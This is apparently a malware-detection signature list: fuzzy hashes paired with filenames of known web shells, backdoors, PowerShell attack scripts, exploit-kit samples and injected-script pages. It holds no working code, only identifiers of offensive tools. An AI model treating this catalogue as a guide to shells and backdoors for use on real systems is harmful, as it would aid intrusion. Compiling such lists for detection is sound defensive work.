+384:MUp6B81OK5fLNZMnqtn7ppLTxFaxrm+/BV+xEtl4Y7Q68uxRdcX2/3rM4cdISH:MTq11NZjNRTexS+3MYs68uxRC2Prlc3,"PHPRemoteView.txt"
+384:mU/54vtc46/lWPUSjL1U3zvU4uCz1SHyCLKX2i5IoZfLjURfk3mJUPF9v:mUTk9FU3zvU4zJSS0KX2iGoovq,"JFoler 1.0.jsp"
+384:MU/54vtc46/lWgjoL1U3zv44u4zESHyCLKX2iUoZfLjUCmJkPAPY:MUT1jkU3zv44/YSS0KX2iUo4y,"jfolder01.jsp"
+384:MU/54vtc46/lWgjoL1U3zv44u4zESHyCLKX2iUoZfLjUCmJkPAPm:MUT1jkU3zv44/YSS0KX2iUo4o,"jsp.jsp"
+384:MT0C28pWWzLcSrM9qG3Ij2wH9657T03IABcjNBXY6UyPgMKkPWiAQCvvr3IEESPX:KHLLWHjQM+QCvrI+12BN8n3,"2016-06-20-Sundown-EK-landing-page-1-of-2-second-run-with-IE8.txt"
+384:mMpxQQNISQ68QI0Q0iQ2HpwqDpstfedIbKGJQLMDw:mmWQWd6DI70thqDp5L0s,"Thumbr.php.2.006"
+384:mMpxQQNISQ68QI0Q0iQ2HpwqDpstfedIbKGJQLMD7:mmWQWd6DI70thqDp5L0v,"Thumbr.php.3.003"
+384:mMpxQQNISQ68QI0Q0iQ2HpwqDpstfedIbKGJQLMD4:mmWQWd6DI70thqDp5L08,"Thumbr.php.2.007"
+384:mMpxQQNISQ68QI0Q0iQ2HpwCt5dAbKGJQLMD7:mmWQWd6DI70thwj0v,"Thumbr.php.2.005"
+384:M/JRn2pe7QcsZeThA96QLK/w+kZvgWON5cp9jR6S2SR8uUvCQE1fALnlJT1fOt7u:M/73sZeThA96QxONmKab1fArlbfsy,"wp-emoji-release.min.js.txt"
+384:MJbIest7eAMQcsplII4YefQfPVQ0WYmfJ0GSGK+QIQ:wbi+QXph4YeCtQzhg+QIQ,"2015-010-Excel.zip"
+384:MIoq47z2YEEFmBIff4zBZfVh2Ju/tOJJJaJJJ2Ofvuy/97M8T:MIoq47z2YEmmBIf0h32SZ3,"core"
+384:MhziUsEGvqq21+pqO0FhKquk+vg8utBvfAC6rVAPT2xrd4ccNrDraAzd2+dHwL/S:CzilxZ2gpq/Ffiv7u3Yg9Drv3HwLq,"NTDaddy_by_obzerve.v1.9.asp.txt"
+384:MDmu50mLW/hXKiy0yEi/D4yHzNsPsQ+tVLhasNyf+tVLtuP/o7Hd4po0Pje1rx8t:MDmu5c/+rFzQ+qf+8P/ord4po0PZ,"system.jsp"
+384:MB+Tf/7iQHrAm9vDDWUxDrjn7aDYEt6gd:MwVDH7a0Et6gd,"Execute-OnTime.ps1"
+384:mA46MW2U9+QBjFt8aX35I7gi9u+uNn3sL0IeuXho+mHRtJhxhxhkYhyh3h9+hVhB:H4DCxvud9u+2oedHRX/TmYIFX+3XX9ks,"2016-07-25-page-from-sinyimusic.com-with-injected-script.txt"
+384:M4c6fYLtpoCNEtUEL8Y8Q874w8iTV5bu2eZ7/qn:M4dfYhCCNDyVNYLbTV5bu2eZE,"rabot.txt.1"
+384:LzxOOYoWY9OQHS1XFlHHNEkoEktV+SSS/o2w7Az2EqISf:LzEOY/CON1VlHHNEkoEktV+Sf/o2w8yV,"myshell.txt.001"
+384:LzxOOYoWY9OQHS1XFlHHNEkoEktV+SSS/o2w7Az2Eh:LzEOY/CON1VlHHNEkoEktV+Sf/o2w8y4,"myshell.txt"
+384:LzxOOYoWY9OQHS1glHHNEkoEktV+SSS/o2w7Az2Eh:LzEOY/CON1glHHNEkoEktV+Sf/o2w8y4,"myshell.php.php.txt"
+384:Lzqf31fisccirpjV7qoxg2yOJTCUSC0XMEOXlntzZDzj6nzwJyKwmDPsgX:Lo31ayiEo+2TCFolntlzCwJp1D,"phpshell3.jpg"
+384:lx5ERGk5mboDomLpwt7f0wQwpwzwH02DP70wZ+NVNR6iTw2jbpAwhwLwKYMTJrlT:HMGkc8DZqZB+sHqnR6iTvLWk4Mg1ibC,"b.css"
+384:lSbO/GHa9CKGtKTYY4O+Z0jx3Fm9zt6mY:ocaa8KG4c8mS,"CAR014 151239_2.doc"
+384:LRRxQQNISQ68QI0Q0iQ2Hp2qDpOtf+dIbQVIULMQjP:LnWQWd6DI70t3qDpNJoSP,"ini"
+384:lLe9O2IOHGKt06ZwznN0z7DkCuprAN4eth:R7KtKnNgPkCcrAKe,"SoldiersOfAllah-v1.0-obf.php"
+384:lKZDTLaukPaOYscjQhcQixBn81EPcBehE8QYjLaNA9m+:oDnk1YrBQG21EPDHzj,"sep16-1.txt"
+384:Lib4AxQQNIMQ68QI0Q0rQ2wsqDpstfRfdIbKVIQfMbT:LAWQWT6DI70kSqDpoLoH,"zeno.txt"
+384:LFy1IyzNe8kpyAAnlDoZRDRxcxzoozkqNYsx95oD2Y2VsUiEBcUlXe0P+ZAcYdlo:LFMz86AAnJcxyDzkqN9C2GUiEBLlO0Po,"kd.php.~100~"
+384:ld7chU/54vtc46/lWgjoL1U3zv44u4zESHyCLKX2iUoZfLjUCmJkPAPd:ld7chUT1jkU3zv44/YSS0KX2iUo43,"test3693.war"
+384:lcKqZSUbR58RkpmzijNeoBtqT/juu+/iSeClJTYZaPKWFbN6:uKqZ7dCupmzqN3K7jsFDTTeaX1N6,"pas.txt.001.001"
+384:LCGjEijsnw0UWRVHuRNerx9IsNFZgSve+tLjFL:LjEiyH5rL,"proxy.asp"
+384:lAjqpIXeRe5eIE8usiFST/kJZKiGVw/Hr8Z2R8bNtas9u4xS/QhHP18m8+RMXQ:lAE87imkJMDk8bNWQVP1DfRMXQ,"cihshell_by_DCRM.v0.99.1.php.txt"
+384:LaEta6+WDuBgzNsrwrwz9hrOCDr0pvkJBZrQ5WCCt9p:LaEta6+IuBgzNs8Uz9hKCDIpvgxQECC5,"bt.php.67"
+384:l8P3zZHnSapD2+gwrzZimMdQX7MPJiyb9LZvx9Pu9KX8kPTsp4EWlLRuAyNRJ45k:lWzZHSawuZ0G4PP9lnXhh0tNR6y,"test.ear"
+384:l77nFxbVIvvkaH6wjPC2FAwqF/o2Pn8NtP8JYn9GQkIief0bG//dQnZy9hwvAhDV:lnCvkwjpXqjSRiM7l0bGX1hDJhsfdf4,"NIX REMOTE WEB-SHELL.jpg"
+384:KZUgEl7x/K8JB1wtOuwpdZhGcIIcMJSFk:KZDe7x/XJBCOtdZhZII/SFk,"pwnginx-master.zip"
+384:kz7tA5aWH08fpuqCUqKWmtql13yVF8C7v7YqLQWPb/mzS9O2fsxx:ku5G8fpkPKQ7iZDtT/LUyax,"20160131-075927-Vq0yP2juZ1YAACZAd@QAAAAF-file-LQsJoJ.1454191168_1"
+384:kyOfO0l7Owg7ueXKZsShsbABUU+h6VX2293yjhlTf3QocF8mV2nk:kxWoqBXFSxTJp2tjDoocF8mX,"pas.php"
+384:kYmauLp8ILB65SjHAS7/UsKh4h1bMLzGm/ojPIQp3izRmbeW9zG7AYBz:IauGaB65SjgS7/7Km12zGdIoyw9GcYBz,"13a1779a6c6b169bdced34355fa492b1_php.txt"
+384:KXoIceLsSeclJIqkwl0oDXoIceLsSeclJIqkwl0oo:SoveISe+Ial0ioveISe+Ial0/,"botynet.php"
+384:kX6Vwah+BK+ACHpHi0XRTtM0l+X6twah+BK+ACHpHi0XRTfRML:Jim+B/tJi0X9ZlzKm+B/tJi0X9c,"pBot-gif89a-header.php"
+384:KU/54vtc46/lWPUSjL1U3zvU4uCzF9hTsmGwsSHyCLKX2i5IoZfLjURfk3mJUPAp:KUTk9FU3zvU4zfVstSS0KX2iGoovM+,"jfolder.txt"
+384:KU/54vtc46/lWPUSjL1U3zvU4uCz1SHyCLKX2i5IoZfLjURfk3mJUPAiD9k:KUTk9FU3zvU4zJSS0KX2iGoovM+,"JFolder.jsp"
+384:ktrRx64XlTuAZopWaJWUoZhsd3Muxn4RP:kZdXlT1opfQgNxn49,"2016-07-11-Cerber-decryption-instructions.html"
+384:Kt7sx5ERGk5mboDomLpy0wQwpwzwH02DP70wZ+NVNR6tTw8x6PuNXINn9dbEF5e:KZyMGkc8DZs+sHqnR6tT1ENn9doFM,"z.css"
+384:KROI0QAr7mTQB2LoEVorj1G1dGwErRXQC3UsKNNUH42dl:gDS68B2LoEyj1G1dGwev3UBNUHbdl,"VirusShare_a10020ca65e732d8c4b6ca9110640bab"
+384:KRgVWEBF3sPwB6rsRnflxcs1t/ICDuOn/5LJg5vk0TcRw/26nVpVoTJ:RVWErsPSflxF/fuOng1ktz6Vp4J,"CWShellDumper.txt.1"
+384:KRgVWEBF3sPwB6rsRFflxcs1t/ICDuOn/5LJg5vk0TcRw/26nVpVoT0:RVWErsPgflxF/fuOng1ktz6Vp40,"CWShellDumper.php"
+384:kPb3d5/FJze/7JX6VyPo9IUnF/KJtW1rKn8MMB/0Eb11hB/4/QwEAVKo+bmw3F3:ot1zeTJX6V79nnFi+wn8MMaEJ1hxeGb3,"spy2.php"
+384:kMR6xUEgEFlbnmnGYcmSK58RmErZhz7ZGAlbYfGxbXI2IxhYcaME9RJZ0GC3:+xUEgEFlbmn7qmErZhz7ZGAlbYfGxbXy,"2016-07-07-page-from-gennaroespositomilano.it-with-injected-script.txt"
+384:kMR6xUEgEFlbnmnGWcmSK58RmErZhz7ZGAlbYfGxbXI2IxhYcaME9RJZ0GC3:+xUEgEFlbmnNqmErZhz7ZGAlbYfGxbXy,"2016-07-01-page-from-gennaroespositomilano.it-with-injected-pseudoDarkleech-script.txt"
+384:KL6Dyh7L7a1rqEymoUTkVB0fDSsvT9uRAvppbLHbrHbuHbMHbmHbPjbKHRMHbDHp:K6Dyh7L7a1rqEyR6v77Ui4QIFjaOV,"Backdoor.ASP.Ace.y.asp"
+384:KhXL5XMEt+GeIlhwJENHvwp60y2AvgE747uSl6StIavv:Kha9/EhwJENPws0yRgEb0dt1,"2016-07-08-Rig-EK-flash-exploit.swf"
+384:KGYCSGIS5cM17ARXqPcgZRcbnjN1EowjdHzHR7U4v0jWEXRoTzF3:RYCSHS5b7ARaJZowjdH17N0jWEhyt,"04cffc1b37bf32eacf9f197c29cef424_php.txt"
+384:KDS4H5gYf/5vQM7Mxt1eKsb88t4sTl71A2yBCfKECVv:K5ZgYytc/88OK71byBpF,"c67396bb4f086d0d1de8d94da8b76266_php.txt"
+384:KB3vdIU4aNwW1dzdUHCEbMHS7x+oLzfSi21k0icJY1macJY1mEpK+hb2VEz2miLO:Kx1FXfzdUHCgX7x+sUk08pZ0dIeY,"006ad074410d4ede728126df0c77dd94_php.txt"
+384:k11AE2F/WB4LN2udpWT/bxn31uyzjxPo44A4z7wuRxGqjtexif3ff7hK/y:sZ4LN2uW7bxn4fwS2KLp,"sad.txt.001"
+384:jYg+YkdRgGaFKjAm9vDDWUxDrjnvDYEtJt:jYYF0VDHv0EtJt,"HTTP-Backdoor.ps1"
+384:/jL6W0puyZDNMZ7csco7DfCMiv+N8Y4+qabloBX:/jL6fdNMZ7zCMiv+N8N+fa,"aioshell.php"
+384:Jl66fEL8ZyCtEt5EQCJCpCuiFCnTpkz6OWg:JlPfEgkCtezeGleITpkz6OD,"j.txt"
+384:J+KPqducDgfMmX/rWpfv25efowORV+N2mr8pyTjWfXtT/YGUvwoTP:JGdu0KN/rsJfowORV+fIpVuP,"Backdoor.ASP.Rootkit.10.b-ASPRootkit-v1.0.asp"
+384:jKMvzHotHJKSrNFvBfAsOz8Jzb5StqZbJXcEHPOPfQM3/+5mGVv/vsBuXs2:jKMLoRpeza5SASEHWw2+5mGVv/EByx,"lifkaS.php"
+384:ji1WK9XTVBD8cRQ3RVLvBdTDqQAmKcfIk97hePzVcrqDS0q:ji1Dgca3/VdpMOIk9k7xS0q,"index.html.1120"
+384:ji1WK9XTVBD8cRQ3RUQlVkBdTDqQAmKcfIk97heQzVcrdDS0b:ji1Dgca3GQfodpMOIk9k+sS0b,"index.html.1114"
+384:ji1WK9XTVBD8cRQ3RQvthBdTDqQAmKcfIk97heJzVcrSDS0+:ji1Dgca3ilvdpMOIk9kBVS0+,"index.html.1130"
+384:ji1WK9XTVBD8cRQ3RpYXpBdTDqQAmKcfIk97hetzVcrlDS0b:ji1Dgca3XQdpMOIk9kF0S0b,"index.html.1136"
+384:ji1WK9XTVBD8cRQ3RluvXBdTDqQAmKcfIk97heMEzVcrzxDS04:ji1Dgca3HkdpMOIk9kt4S04,"index.html.1143"
+384:ji1WK9XTVBD8cRQ3RLPRHBdTDqQAmKcfIk97heBzVcr2DS07M:ji1Dgca3BJhdpMOIk9kZVS0I,"index.html.1135"
+384:ji1WK9XTVBD8cRQ3RCi2eJBdTDqQAmKcfIk97he4zVcrhDS0E:ji1Dgca3UiX3dpMOIk9kG0S0E,"index.html.1140"
+384:ji1WK9XTVBD8cRQ3RAcq+dBdTDqQAmKcfIk97heczVcrVDS0E:ji1Dgca39J7dpMOIk9kaAS0E,"index.html.1133"
+384:jh6K57qAMkY0ddr8iQgNhjRuwHq8GOkRFscJyCLKXo5K0KaKzKjFbOW+I3agvYQy:w78FVRuwHveF/Q0KXo+6rEK3m,"webshell-nc.jsp"
+384:JfTjjrJCjgVSrElLu2s+8WkssXM38wLgahCFWAlHJ77:9hSgVSrElC2TcXM38F3lHV,"e6c9e799f04995644d3af4dc1b5c15db_php.txt"
+384:j+BfkbwXiHfBA7M4aq0VZzrDS0fzmkrIoXd48fD+nr/RO6vzrcxigYIAV/XmaDu9:j+pLtXaeoshzrQigdCP9DuMuB,"Backdoor.ASP.Ace.gf.asp"
+384:JAW1GvRWwNiW2dS7CzwcztUvREy6GxV6/yVsppqbY1T2Kz5yooMe2mQQzW6TDIXN:JAW1GvRWwNiW2dS7CzwcztUvREy6GxVQ,"2016-07-08-pseudoDarkleech-CryptXXX-decrypt-instructions.HTML"
+384:j7HgOdDuGJsg2WiomOsxeblGP7j1QUTJgifwk/jG2AhBsVTioX90n:HV4LrWioF5QvTJJfDCke,"121.jpg"
+384:j6kG53d62u4nKL+XXRf/X2/gHzv/0L0fCIS3:jGN636w+xf+Q/0L0Y,"small.txt"
+384:j6kG53d62u4nKL+XXRf/X2/gHzv/0L0f5:jGN636w+xf+Q/0L0x,"small.php"
+384:J6DbfJC5oyrHWxWUfOos38PSeQ6xuZxQjaSHyCLKXUZ0kH17etAmrvRwt9y:JotiWgUGos38PSeQ6ey+SS0KXu0bhR,"JSP Shell 岁月联盟专用版本.jsp"
+384:j04AkmVoSNW+1MyAyDuiEiUZwH4xsH86F6UanlgE8QspSK8MET:j04mVoSNb5AwrC64S86sUankYK85,"g00nshell_01_by_g00nFiSh.v1.3.php.txt"
+384:iZwfujFddCOb/W721N2SLFzQYCIObj2BWh70:GpdCOrW61ESVOIOe0h70,"Out-CHM.ps1"
+384:IzqIVljwQHilbdUArKibF8taNtV5IJS0VaUQdiKVajnnfCAJqOaq/lGgq+udSAW4:mqIVl3Hi9dUt1kcYgVDsCvoScZ,"2016-05-16-page-from-prg.usp.br-with-injected-EITest-script-second-run.txt"
+384:IxMGHzsKiMXYIJa/BI5fLNR9yjasioyiMHEhp3F+HHc3hb2kUEhuvs4oyS:CvHA9GYIJa5I5fPTTkhEWhb2kLh2oL,"20160202-134616-VrAmiGjuZ1YAAC9wCL0AAAAH-file-p5nDuY.1454384777_1"
+384:IxFKgKIA4ai+bar4uP3XGhhX+3kyD7ngDSAkjFwK4CFt4dBpRscUD92zzH+SDS:IxFGHi+bar4i6hgUDZkJwfpID92zL+S+,"Knull_Shell_by_Knull.v1a.php.txt"
+384:IXDLvV5rqMcoEHMWX3o5sj9dvz9IcU/pyNR:aXrbqN2jps,"ma2.jsp"
+384:IuU/54vtc46/lWgjoL1U3zv44u4zESHyCLKX2i/oZfLjUjymJkPAPR:BUT1jkU3zv44/YSS0KX2i/oov,"in.jsp"
+384:IMK1iLiXe4b1cffptTqUqX1AI6ndEWhTqW3HOA1zHcWawORPCEsWu0IEVJ:IMKtO4OTqVFWPTRHlGnxCE80nf,"32cae4c900083830a1d9b7b8035c326a_php.txt"
+384:ILDUI8NFxbdW2aFXnIGDuMeAAyQ7iDFftPaAzQbUXVXC:WUtjJW2c9uHHyba9IS,"util.py"
+384:iKdgtR0pIC0E+hw1cVhwXWOSv0jLDEjkIkhbf4jGrNx3EcVANQMnqNiKIP7l63by:iKOWqvOW10jL4BKUGrNmBqhIP7kbVDs,"2016-06-29-Rig-EK-flash-exploit-after-gate-on-45.32.187.36.swf"
+384:iK7f58ZS9Y1ZFvdbthZX85wJGdv2c2mWzLZsh+S1w:iKr58ZhtbX85wAdv2IWzLZs51w,"2016-06-28-page-from-airbornehydrography.com-with-injected-pseudoDarkleech-script.txt"
+384:/iiSLxXbKoPPeAcsPHE10mcVcGXw3y1GKnDFH:a/LtbKoT4FbGw3y1tnDFH,"fatalshell.php"
+384:iIiH2ER39I1Vv+kIPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUU:iIy2ER3CL+khWUYcsJtMcDiuSA93Duxx,"fc26dc3bc9dd2b6ceccafd48e76915da_php.txt"
+384:IGmG53d62u4nKL+XXRfXX2/gHzv/0L0f6:IUN636w+xfWQ/0L0y,"Small Web Shell by ZaCo.php"
+384:IGmcG53d62u4nKL+XXRfXX2/gHzv/0L0f/ISf:IBN636w+xfWQ/0L0J,"Small_Web_Shell_by_ZaCo.php.txt"
+384:IGmcG53d62u4nKL+XXRfXX2/gHzv/0L0f6:IBN636w+xfWQ/0L0y,"zacosmall.txt"
+384:Ia4p0NoVNOI9vhihcncQvTsO3t+2KrrBi5V/w:34pOoVoI9vh6cncKTsO3t+2KrrBB,"spexec.aspx"
+384:I9Njp9hxPHw7+0kXp6/VIKvecIdsI4pat9Wa6eMaqTedstxyBrr73Y40:MhSIn9Wa6eMrTedsGp73YB,"2016-08-05-Magnitude-EK-more-html.txt"
+384:I4ejIzUKNEtyFjQ2Fo6m25dM+qKBZ9iVV:IINEtOF7lB6,"9955fc09f1633fbb24d5e1b3dd03551d_php.txt.001"
+384:HWIt00+sVU7QtYoP7hbPUICdwiMoMZRM0W0YhqsxPXNDYl9+qBkVGkfj0eW6lPv6:2I7tBtcICmZm0W0Yh/xP9DYl9+q4Gkfo,"2016-05-19-EITest-Angler-EK-payload.exe"
+384:HW7bpTuUgV4qABUyiazL7y1YZe/JEtC73/Hc+FTAXmEVm:2RgV4qABUyiazC1ae/+tCj/Hc+FUXmE8,"WebSniff 1.0  Powered by  C.C.T.aspx"
+384:HW7bKTuUgV4qABUyiazL7y1YZe/JEtC73/Hc+FTAXmEVm:TRgV4qABUyiazC1ae/+tCj/Hc+FUXmE8,"aspx下嗅探工具websniff1.0-linux.aspx"
+384:HW7bJTuUg24qABUyiazL7y1YZe/JEtC73/Hc+FTAXmEG05:eRg24qABUyiazC1ae/+tCj/Hc+FUXmEH,"sniffer--aspx的嗅探工具.aspx"
+384:HRgVW3BF3sPwB6rsRtflxcs1t/ICDuOn/5LJg5vk0TcRw/26nVpVoTJ:GVW3rsP4flxF/fuOng1ktz6Vp4J,"CWShellDumper.txt"
+384:HpCSmGZSNf9pwG3y83QFfNtoEXStJ7ZZdxfRvy+GnKOW:kGk9pzm23Dop5W,"shankar.php.php.txt"
+384:HLlbT4+mYzR5CYinX253U1E61HAqR64ISf:HLlbT4+mYzR5Oa3U1f1gqR64,"ironshell.txt.001"
+384:HkYU6fMrIrIM3gt6gqmGIAZ5LqfF8TbqJ:EYFfMEkM3xxmGIAZYfF8y,"T.jpg"
+384:HkYt6fMrIrIM3gt6gqmGIAZ5LqfF8TbqJ:EYEfMEkM3xxmGIAZYfF8y,"byroe.jpg??"
+384:HFy1IyzNe8kpyAAnlDoZRDRxcxzoozkqNYsx95oD2Y2VsUiEBcUlXe0P+ZAcYdlj:HFMz86AAnJcxyDzkqN9C2GUiEBLlO0Pj,"VirusShare_3d65f6979a13d751e86ca0839a81a797"
+384:hfldY1zE4LWxlxhZ4PtWjaJFedDgun3y+/si9:h92MxhZ4PtWGJcKE/z9,"Backdoor.ASP.Ace.k.asp"
+384:hEwUTyRvee2h9iq9EZYvOtJNnaHCQt5xo8iUyL4QIc1+F1:hmiBaiKo8iUgjIF1,"Perl_Web_Shell_by_RST-GHC.v1.pl.txt"
+384:+hdEYi+IkKffUYEfXx//hBmItWLSybmHdAP2tyc5zQ:N+/fXx//hBmLjb+djQ,"2016-07-18-page-from-riverhotel-vp.com-with-injected-script.txt"
+384:hbhZpy167ex0xe3vCxXCeb47d58fAlbLB:hbZOyDx6v2Seb47d58IlbV,"phpshell3.php"
+384:GZ6LA+CCNz9gw6b7vNcboxHahJ5nRGBftUevp3e0s:GZeAlCNz9gw6bzuboxHadUBzvpOh,"Sabrina.jpg.1"
+384:GyuiREkTF3iqGuKZDkXDeNgSQRct2B7gO3pYa8:GHiREkVHGJZDk1YpO3pK,"n.txt"
+384:GxVdti3chNaKMdBPMsP0iyOLLkVh3QauRjrZC/LO:G9g3chNT6My0JO/U0pFCa,"ACat_jdk1.5.jar"
+384:gWHsLYA8PDZF2myBHkk2jDl0KMPHsMDkS:giEmyBHfUl0tHnB,"Thumbr.php.2.002"
+384:gTBm7NZnQVJSGP4QTIQTvbbJd1GT3GRR4yTk:MUZnQOGhTZTvbbJdYT2ReyQ,"sourceinc15.php"
+384:GrHLUM05XNjqY1Z7llKqvXsyBIKjQjtVnoi+JYDo4VT12se8JYSa:wLZYXNuYpxvXskrGKse8JYF,"NTDaddy-v1.9.asp"
+384:GRbsk1hqOUV8eMeTknxxXLRv5Tfj7slxCQxre:GRbsk/qOUViNsjxre,"un.txt.1"
+384:gqfdRfQqpfvibqR5+f09fF7HNd9hTsmG+5:g8SqlEqR5bJVs0,"kacak.txt"
+384:gOsl+HlGbzt4Omf8v0xLWyCV4KMbveU+blf/dC:gOzHl0zt4O9v0xLWJmSf/Y,"zorg1.php"
+384:GlXU2OjcglFEX5JgOQEgSrUevs4lHCAfDUL4mfR9v+sPEpQOwCKv:SxOjc0FSP3gSrUe7/gcmfR9v+sPiQXv,"Sst-Sheller.php"
+384:gkm6kkUW7djaBoB6CgmflBpBCImoIL45qFeyw7M+2D3C+QaeaLd9LGQcowWx8wWH:Xkmt4osvSF3KnChZA82T82aKnvTL5rw,"powercat.ps1"
+384:gKg3vihOTvOLWl8FocGeLj02cylvZYEmFvbSbJgk4:gKgflzOKl8xTj07evMFsT4,"Sabrina.jpg.3"
+384:GIr8nsnAJ0pncTyZhCmmg7ylEJKiIhyZzVxUdnA6abSczJMc84ZCrczRcmNbQ60x:EJ3yZhCE7y0bZP00Mj6G,"Cyber Shell.php"
+384:GiAKpA+7yVBD8cT3RACOVwfmRXLbRXLHdgMH3blfPkycbp5CizVcrHDJZTOmukJ2:GiK+ugcT3VS8ed1RPkyrEqJZTOmvJ2,"crimecyber.php.25"
+384:Gi9KpRVAVBD8cxQ3RlTuKBejFdgMH3b6DqQAmKcfPkycbp570QbG3DzVTs4wc:GiHgc63Odd12MOPky20QC3f24wc,"bot.txt.3"
+384:Gi9KJ9iPAVBD8cxQ3RCcDbfF9dgMH3bgAWkScfPkycbp570QbGYCzVTs4L7:GiGFgc637bDd1ZSOPky20QCYk24L7,"bot.txt.2"
+384:Gi9K8NKQmYAVBD8cxQ3RN+KFHM9dgMH3bg+X3cfPky5ba570QbGUTzVTs4A:Gi7KQ+gc63LFHed1LOPky00QCUP24A,"bot.txt.8"
+384:Gi9K8NKQDrAVBD8cxQ3RzwgZEF9dgMH3bg+X3cfPkycbp570QbG8lzVTs4W:Gi7KQogc631ZQd1LOPky20QC8924W,"bot.txt.13"
+384:Gi9K8NKQDrAVBD8cxQ3RX0150F9dgMH3bg+X3cfPkycbp570QbGnCzVc94A:Gi7KQogc63kgd1LOPky20QCnkq4A,"bot.txt.17"
+384:Gi9K8NKQDrAVBD8cxQ3Rw/YFF9dgMH3bg+X3cfPkycbp570QbGDwzVTs4t:Gi7KQogc63nBd1LOPky20QCDe24t,"bot.txt.1"
+384:Gi9K8NKQDrAVBD8cxQ3RvJZIdF9dgMH3bg+X3cfPkycbp570QbGX1zVc94x:Gi7KQogc63hI5d1LOPky20QCXtq4x,"bot.txt.24"
+384:Gi9K8NKQDrAVBD8cxQ3Rtyb3nF9dgMH3bg+X3cfPkycbp570QbGDLzVc94Gp:Gi7KQogc63S3Ld1LOPky20QCDHq4e,"bot.txt.19"
+384:Gi9K8NKQDrAVBD8cxQ3RQVhkHgF9dgMH3bg+X3cfPkycbp570QbGgxzVTs4g:Gi7KQogc63YkH8d1LOPky20QCgp24g,"bot.txt.7"
+384:Gi9K8NKQDrAVBD8cxQ3Rogo1uqF9dgMH3bg+X3cfPkycbp570QbG3jzVTs49H:Gi7KQogc63CuWd1LOPky20QC3/241,"bot.txt.14"
+384:Gi9K8NKQDrAVBD8cxQ3RnfdREF9dgMH3bg+X3cfPkycbp570QbG6lzVTs4P:Gi7KQogc63dQd1LOPky20QC6924P,"bot.txt.16"
+384:Gi9K8NKQDrAVBD8cxQ3RkMGmF9dgMH3bg+X3cfPkycbp570QbGI/zVTs4P:Gi7KQogc63oCd1LOPky20QCIL24P,"bot.txt.4"
+384:Gi9K8NKQDrAVBD8cxQ3RHOsYF9dgMH3bg+X3cfPkycbp570QbGaZzVTs4pjc:Gi7KQogc63V0d1LOPky20QCax24pI,"bot.txt.10"
+384:Gi9K8NKQDrAVBD8cxQ3RFPBYTsTj3YVF9dgMH3bg+X3cfPkycbp570QbGU3YdzVO:Gi7KQogc63VPUd1LOPky20QCUgq44,"bot.txt.20"
+384:Gi9K8NKQDrAVBD8cxQ3RCPt3kF9dgMH3bg+X3cfPkycbp570QbGiSzVc94o:Gi7KQogc63y3wd1LOPky20QCiUq4o,"bot.txt.21"
+384:Gi9K8NKQDrAVBD8cxQ3RcIPo8F9dgMH3bg+X3cfPkycbp570QbGZ6zVc94e:Gi7KQogc63pood1LOPky20QCZcq4e,"bot.txt.23"
+384:Gi9K8NKQDrAVBD8cxQ3R/cb6F9dgMH3bg+X3cfPkycbp570QbGSzzVTs4qx:Gi7KQogc63AGd1LOPky20QCSv24qx,"bot.txt.12"
+384:Gi9K8NKQDrAVBD8cxQ3RC8hCF9dgMH3bg+X3cfPkycbp570QbGWLzVTs4U:Gi7KQogc63ZOd1LOPky20QCWH24U,"bot.txt.9"
+384:Gi9K8NKQDrAVBD8cxQ3RaPGQMUF9dgMH3bg+X3cfPkycbp570QbGyM1zVTs4H:Gi7KQogc63Chd1LOPky20QCy+24H,"bot.txt.15"
+384:Gi9K8NKQDrAVBD8cxQ3RAG4b6F9dgMH3bg+X3cfPkycbp570QbGeEzVc94i:Gi7KQogc63UbGd1LOPky20QCeCq4i,"bot.txt.18"
+384:Gi9K8NKQDrAVBD8cxQ3R9vYLF9dgMH3bg+X3cfPkycbp570QbGeHzVc94QgW:Gi7KQogc634vd1LOPky20QCeTq44,"bot.txt.25"
+384:Gi9K8NKQDrAVBD8cxQ3R8XkwfF9dgMH3bg+X3cfPkycbp570QbGSCzVTs4sN:Gi7KQogc63HwDd1LOPky20QCSk24sN,"bot.txt.11"
+384:Gi9K8NKQDrAVBD8cxQ3R2jwbuF9dgMH3bg+X3cfPkycbp570QbGb3zVTs47:Gi7KQogc63bbKd1LOPky20QCbj247,"bot.txt.5"
+384:Gi9K8NKQDrAVBD8cxQ3R1TSBF9dgMH3bg+X3cfPkycbp570QbGT8zVTs4cv5:Gi7KQogc63+Nd1LOPky20QCT624m,"bot.txt.6"
+384:Gi9K4RMNr9DXDX+AVBD8cxQ3RewvvQgEvdgMH3bURWjcfPkycbp570QbG8xzVTsc:GiCNr9Db7gc63bQDd1FOPky20QC8p24p,"bot.txt"
+384:Gi0uoS1N7L66b5qyKprAm9vDDWUxDrjn5dYEtARxV:GgCVDH5mEtARxV,"DNS_TXT_Pwnage.ps1"
+384:ghct2WULFA27GH15k1FWW/OmVOGOVigeFdrZDHcxVwE9sB1eRF8iQEkQxhvTa0Ja:ghtLZv/O7DwpFTgxh9s3eRFvRTZ0,"g00nshell_02_by_g00nFiSh.v1.3.php.txt"
+384:gD+CkWpmyw4X3znP78lhkEtF/TE/leuOithK28Y0+v:gDDxdX3zYlSEtF/pivK28YZ,"b374k.m1n1.min.php"
+384:g7B0jskK1aS+hP1wwUxsu+LYeAwa33sAt3cRVTcWLnvvQfkUM1WM:g0isAtMH4qD,"Thumbr.php.2.003"
+384:FZh7amKTiK3fpKcKFGT1mCgfGo/ZoeOvm/M:FamKTiK3fpKcKFGT19gfp/ZoeiSM,"Manager.php"
+384:FYkbu62UqiOposWyjhPYPQ874wPiTj5dnLeZ71qn:FYkbj2U/OCsWMhwoYLKTj5dnLeZS,"color-rtl.css"
+384:FXOCnQnAJsznh9m2mwLTEtltCj2gQgrmUfycqfQNUvhdWQhv05Sh4Z6upKmM:jJwmUmiYXmM,"Cyber Shell.php"
+384:FXOCnQnAJsznh9m2meOLTEtltCj2gQgrmUfycqfQNUvhdWQhv05Sh4Z6upKmnISf:jJwmjmiYXmZ,"cybershell.txt.001"
+384:FXOCnQnAJsznh9m2meOLTEtltCj2gQgrmUfycqfQNUvhdWQhv05Sh4Z6upKmM:jJwmjmiYXmM,"cybershell_by_Pixcher.v1.0.php.txt"
+384:FXhMjtqs2ci8FMYywyu0xJfBpe2YCGaVk2:atqIi+M8zcIrWZ,"phpspy_2005_lite.php"
+384:fwMfOPVKe/PPZde8DRduSoNUg1lBhn29jd:fFOdnss3uSoNUg1fhn2X,"telnet.txt"
+384:FUtpxcyR0G6ciIs88Gi6xjLomKWZpihfWTItDQJJvpNvZs5Y8Ru6G9SkU8mD:FU1cyR94IPD1/pkf9+3Nyj49Skm,"test.war"
